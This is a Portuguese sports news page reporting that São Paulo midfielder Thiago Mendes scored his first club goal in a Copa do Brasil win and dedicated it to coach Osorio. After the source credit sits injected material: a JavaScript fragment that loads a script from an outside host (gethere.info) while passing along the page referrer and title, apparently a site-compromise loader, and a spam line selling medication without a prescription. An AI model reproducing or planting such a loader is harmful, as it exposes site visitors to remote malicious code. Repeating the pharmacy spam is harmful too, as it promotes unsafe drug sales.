Destaque Noticia

Thiago dedica 1º gol no São Paulo a Osorio: ‘Vem trabalhando bem’

A noite da última quarta-feira foi especial para Thiago Mendes. Depois de disputar 36 partidas pelo São Paulo, desde que chegou em janeiro, o volante marcou o primeiro gol pelo clube no Castelão, fazendo o segundo tento da vitória por 3 a 0 nas oitavas de final da Copa do Brasil. E o feito foi dedicado na comemoração ao filho do atleta e nas entrevistas ao técnico Juan Carlos Osorio.

– Fiquei muito feliz pelo gol, mas principalmente pela atuação porque trabalho sempre para ajudar o São Paulo. Foi um momento marcante e por isso fiz questão de beijar o símbolo e festejar com a torcida, que cantou durante todo o jogo e nos apoiou do começo ao fim do jogo. A vitória foi importante para o grupo e para o nosso treinador, porque ele vem trabalhando muito bem – exaltou.

Desde que Osorio chegou ao Morumbi, o São Paulo jogou 18 vezes, incluindo a vitória por 3 a 2 sobre o Santos quando o treinador ainda ficou nas tribunas do estádio. Nesse período, Thiago foi o segundo jogador que mais participou em campo: 17 partidas, perdendo somente em minutos jogados para o meia Michel Bastos. Isso tudo graças à versatilidade de quem atua como volante, meia, lateral e até centroavante.

– No segundo tempo, atuei como centroavante porque o Osorio estava preocupado com o meu cartão amarelo. Em alguns jogos as coisas não deram certo, mas hoje o time teve um bom comportamento e conseguiu marcar um dos gols, porque a gente precisava para sair de campo com a classificação – contou Thiago.

Sob o comando de Osorio, o camisa 23 ainda registrou uma assistência, justamente no clássico com o Santos. No geral, Thiago soma cinco passes para gol na temporada, atrás apenas de Michel Bastos, com oito, Paulo Henrique Ganso, com sete, e Alexandre Pato, com seis.

Fonte: LanceNets.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; obtain at low price medications no prescription put in cart cheaply medications without prescription – http://new.921thefrog.com/index.php/put-in-cart-cheaply-medications-without-prescription/

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque Noticia

Mais em Destaque Noticia

pratto

Jejum de gols no São Paulo incomoda Pratto

saopauloadmin21 de setembro de 2017
treino

Dorival esboça time que enfrentará o Corinthians

saopauloadmin21 de setembro de 2017
junior

Junior Tavares dá volta por cima e arranca elogios internamente

saopauloadmin20 de setembro de 2017
rodrigo

Com canela cortada, Rodrigo Caio valoriza treinos de Dorival Júnior

saopauloadmin20 de setembro de 2017
marcos

Na semana do clássico, Marcos Guilherme relembra 100º gol de Ceni

saopauloadmin20 de setembro de 2017
morumbi

São Paulo projeta lucro de R$ 10mi com shows que vão tirá-lo do Morumbi por cinco rodadas

saopauloadmin20 de setembro de 2017
torcida

“Torcida exemplar” já compra quase 48.000 ingressos para decisão contra Corinthians

saopauloadmin19 de setembro de 2017
marcos

Atuar no Majestoso: Mais um sonho realizado por Marcos Guilherme

saopauloadmin19 de setembro de 2017
sao-paulo-dorival-junior-hernanes-time-instrucao-beira-campo-getty-950x715

Dorival ganha opções no São Paulo para o clássico

saopauloadmin19 de setembro de 2017